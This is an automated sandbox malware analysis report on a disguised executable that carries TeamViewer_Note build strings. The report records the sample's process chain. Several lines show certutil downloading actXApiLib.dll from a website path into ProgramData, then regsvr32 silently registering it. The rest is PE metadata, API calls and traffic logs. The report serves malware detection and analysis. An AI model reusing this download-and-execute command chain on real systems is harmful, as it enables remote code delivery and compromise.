Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll |
Virustotal: Detection: 11% |
Source: cBQPecnQRp.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2 |
Source: cBQPecnQRp.exe |
Static PE information: certificate valid |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00466410 FindFirstFileExW, |
1_2_00466410 |
Source: C:\Windows\SysWOW64\certutil.exe |
Network Connect: 100.26.95.170 187 |
Source: C:\Windows\SysWOW64\certutil.exe |
Domain query: www.christchurchmvl.org |
|
Source: Joe Sandbox View |
ASN Name: AMAZON-AESUS AMAZON-AESUS |
Source: Joe Sandbox View |
JA3 fingerprint: ce5f3254611a8c095a3d821d44539877 |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49773 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49772 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49773 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49772 -> 443 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 11:47:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.digicert.com0O |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.sectigo.com0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: https://sectigo.com/CPS0 |
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp |
String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll |
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp |
String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC: |
Source: cBQPecnQRp.exe |
String found in binary or memory: https://www.digicert.com/CPS0 |
Source: unknown |
DNS traffic detected: queries for: www.christchurchmvl.org |
Source: global traffic |
HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: www.christchurchmvl.org |
Source: global traffic |
HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: www.christchurchmvl.orgCache-Control: no-cache |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2 |
Source: cBQPecnQRp.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004340B0 |
1_2_004340B0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00432A00 |
1_2_00432A00 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0049C051 |
1_2_0049C051 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046207C |
1_2_0046207C |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004520EB |
1_2_004520EB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402080 |
1_2_00402080 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004961AB |
1_2_004961AB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004321AB |
1_2_004321AB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402210 |
1_2_00402210 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004443F0 |
1_2_004443F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048C4C0 |
1_2_0048C4C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004744D0 |
1_2_004744D0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0049E4E7 |
1_2_0049E4E7 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004024F2 |
1_2_004024F2 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004685D0 |
1_2_004685D0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00484580 |
1_2_00484580 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004025A0 |
1_2_004025A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048E620 |
1_2_0048E620 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402700 |
1_2_00402700 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045A7C0 |
1_2_0045A7C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00484790 |
1_2_00484790 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402850 |
1_2_00402850 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00424970 |
1_2_00424970 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004029E0 |
1_2_004029E0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402B70 |
1_2_00402B70 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00464CC9 |
1_2_00464CC9 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402CF0 |
1_2_00402CF0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402E70 |
1_2_00402E70 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048CFC0 |
1_2_0048CFC0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0049901A |
1_2_0049901A |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045B2E0 |
1_2_0045B2E0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004773C0 |
1_2_004773C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00401390 |
1_2_00401390 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00433450 |
1_2_00433450 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004454F0 |
1_2_004454F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046B48F |
1_2_0046B48F |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004514A0 |
1_2_004514A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004014B0 |
1_2_004014B0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045154D |
1_2_0045154D |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00433569 |
1_2_00433569 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004755F0 |
1_2_004755F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046B5AF |
1_2_0046B5AF |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00401610 |
1_2_00401610 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00493680 |
1_2_00493680 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00401760 |
1_2_00401760 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048D7F0 |
1_2_0048D7F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004337A0 |
1_2_004337A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00499809 |
1_2_00499809 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004518BF |
1_2_004518BF |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048B9A0 |
1_2_0048B9A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 00421740 appears 48 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 0044FEB0 appears 40 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 0044F762 appears 75 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 00420FA0 appears 63 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 0044F26F appears 71 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, |
1_2_0044E3F5 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process Stats: CPU usage > 98% |
Source: cBQPecnQRp.exe |
Binary or memory string: OriginalFilename vs cBQPecnQRp.exe |
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe |
Source: cBQPecnQRp.exe |
Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe |
Source: cBQPecnQRp.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: cBQPecnQRp.exe |
Virustotal: Detection: 10% |
Source: cBQPecnQRp.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe' |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
Source: classification engine |
Classification label: mal72.evad.winEXE@8/1@2/1 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource, |
1_2_00422D90 |
Source: C:\Windows\SysWOW64\certutil.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\SysWOW64\certutil.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\SysWOW64\certutil.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: cBQPecnQRp.exe |
Static file information: File size 1363448 > 1048576 |
Source: cBQPecnQRp.exe |
Static PE information: certificate valid |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00434A6C push eax; ret |
1_2_00434A91 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00410AAA push ss; iretd |
1_2_00410AAB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044F73C push ecx; ret |
1_2_0044F74F |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx |
1_2_00493991 |
Source: cBQPecnQRp.exe |
Static PE information: section name: .didat |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
1_2_004A5845 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
1_2_0044E000 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo, |
1_2_0044C1E6 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00466410 FindFirstFileExW, |
1_2_00466410 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW, |
1_2_0044EE91 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
1_2_004A5845 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree, |
1_2_004944F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h] |
1_2_0046619E |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h] |
1_2_00434891 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h] |
1_2_0044ECD5 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h] |
1_2_0045D9CF |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044FE43 SetUnhandledExceptionFilter, |
1_2_0044FE43 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
1_2_0045976E |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
1_2_0044F8B8 |
Source: C:\Windows\SysWOW64\certutil.exe |
Network Connect: 100.26.95.170 187 |
Source: C:\Windows\SysWOW64\certutil.exe |
Domain query: www.christchurchmvl.org |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
1_2_00468B1F |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_00468DC7 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_00468E12 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_00468EAD |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
1_2_00468F40 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW, |
1_2_004691A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
1_2_004692C6 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW, |
1_2_004693CC |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
1_2_0046949B |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_0046354D |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW, |
1_2_004639F3 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, |
1_2_004A85C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, |
1_2_004A7879 |